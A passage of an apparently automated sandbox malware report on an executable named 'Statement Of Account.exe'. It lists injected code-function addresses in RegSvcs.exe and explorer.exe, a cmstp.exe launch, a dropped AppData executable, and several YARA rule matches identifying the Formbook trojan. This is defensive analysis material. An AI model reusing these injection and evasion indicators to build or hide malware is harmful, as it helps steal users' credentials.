          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA808_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01036BD78_2_01036BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70CF28_2_00F70CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101CD1F8_2_0101CD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80C008_2_00F80C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7ADE08_2_00F7ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98DBF8_2_00F98DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020CB58_2_01020CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8AD008_2_00F8AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01022F308_2_01022F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88ECF8_2_00F88ECF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92E908_2_00F92E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80E598_2_00F80E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8CFE08_2_00F8CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103EE268_2_0103EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72FC88_2_00F72FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFEFA08_2_00FFEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103CE938_2_0103CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF4F408_2_00FF4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0F308_2_00FA0F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC2F288_2_00FC2F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103EEDB8_2_0103EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F870C08_2_00F870C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104B16B8_2_0104B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8B1B08_2_00F8B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6F1728_2_00F6F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB516C8_2_00FB516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102F0CC8_2_0102F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103F0E08_2_0103F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010370E98_2_010370E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9D2F08_2_00F9D2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103132D8_2_0103132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9B2C08_2_00F9B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F852A08_2_00F852A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F833F38_2_00F833F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC739A8_2_00FC739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6D34C8_2_00F6D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010212ED8_2_010212ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F834978_2_00F83497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010375718_2_01037571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F714608_2_00F71460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101D5B08_2_0101D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010495C38_2_010495C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103F43F8_2_0103F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103F7B08_2_0103F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC56308_2_00FC5630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010316CC8_2_010316CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010159108_2_01015910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F838E08_2_00F838E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F718408_2_00F71840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FED8008_2_00FED800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F899508_2_00F89950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9B9508_2_00F9B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC5AA08_2_00FC5AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103FB768_2_0103FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF3A6C8_2_00FF3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBDBF98_2_00FBDBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF5BF08_2_00FF5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01037A468_2_01037A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103FA498_2_0103FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9FB808_2_00F9FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01021AA38_2_01021AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101DAAC8_2_0101DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102DAC68_2_0102DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01031D5A8_2_01031D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01037D738_2_01037D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF9C328_2_00FF9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9FDC08_2_00F9FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F83D408_2_00F83D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103FCF28_2_0103FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103FF098_2_0103FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F89EB08_2_00F89EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103FFB18_2_0103FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F81F928_2_00F81F92
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41BB309_2_0F41BB30
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41BB329_2_0F41BB32
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4212329_2_0F421232
          Source: C:\Windows\explorer.exeCode function: 9_2_0F418D029_2_0F418D02
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41E9129_2_0F41E912
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4245CD9_2_0F4245CD
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4200369_2_0F420036
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4170829_2_0F417082
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9042329_2_0F904232
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9075CD9_2_0F9075CD
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9019129_2_0F901912
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FBD029_2_0F8FBD02
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FEB329_2_0F8FEB32
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FEB309_2_0F8FEB30
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FA0829_2_0F8FA082
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9030369_2_0F903036
          Source: C:\Windows\explorer.exeCode function: 9_2_1098B0829_2_1098B082
          Source: C:\Windows\explorer.exeCode function: 9_2_109940369_2_10994036
          Source: C:\Windows\explorer.exeCode function: 9_2_109985CD9_2_109985CD
          Source: C:\Windows\explorer.exeCode function: 9_2_109929129_2_10992912
          Source: C:\Windows\explorer.exeCode function: 9_2_1098CD029_2_1098CD02
          Source: C:\Windows\explorer.exeCode function: 9_2_109952329_2_10995232
          Source: C:\Windows\explorer.exeCode function: 9_2_1098FB309_2_1098FB30
          Source: C:\Windows\explorer.exeCode function: 9_2_1098FB329_2_1098FB32
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_00DADCD411_2_00DADCD4
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC978011_2_06FC9780
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC977811_2_06FC9778
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCB3B811_2_06FCB3B8
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC934811_2_06FC9348
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCAF8011_2_06FCAF80
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCAF6F11_2_06FCAF6F
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC0C5811_2_06FC0C58
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC0C4911_2_06FC0C49
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCBD6811_2_06FCBD68
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC282811_2_06FC2828
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040102814_2_00401028
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040103014_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D9B714_2_0041D9B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E21414_2_0041E214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041ECEE14_2_0041ECEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D8814_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D9014_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E5B14_2_00409E5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E6014_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D6A414_2_0041D6A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402FB014_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F516C14_2_014F516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AF17214_2_014AF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CB1B014_2_014CB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C000014_2_014C0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C70C014_2_014C70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AD34C14_2_014AD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DD2F014_2_014DD2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C52A014_2_014C52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B146014_2_014B1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CB73014_2_014CB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014BC7C014_2_014BC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B17EC14_2_014B17EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C995014_2_014C9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DB95014_2_014DB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D696214_2_014D6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C599014_2_014C5990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C29A014_2_014C29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C38E014_2_014C38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B28F014_2_014B28F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EE8F014_2_014EE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A68B814_2_014A68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014FDBF914_2_014FDBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01489B8014_2_01489B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014BEA8014_2_014BEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C3D4014_2_014C3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C8DC014_2_014C8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D8DBF14_2_014D8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C0C0014_2_014C0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D9C2014_2_014D9C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B2FC814_2_014B2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01483FD214_2_01483FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01483FD514_2_01483FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CCFE014_2_014CCFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C1F9214_2_014C1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C0E5914_2_014C0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D2E9014_2_014D2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C9EB014_2_014C9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FEEA12 appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FC7EB0 appears 31 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FC7E54 appears 116 times
          Source: Statement Of Account.exe, 00000000.00000002.1704225673.0000000004B83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
          Source: Statement Of Account.exe, 00000000.00000000.1668852535.0000000000C34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
          Source: Statement Of Account.exe, 00000000.00000002.1712844282.0000000005B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Statement Of Account.exe
          Source: Statement Of Account.exe, 00000000.00000002.1717785891.000000000A290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
          Source: Statement Of Account.exe, 00000000.00000002.1700380760.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Statement Of Account.exe
          Source: Statement Of Account.exeBinary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
          Source: Statement Of Account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"Jump to behavior
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
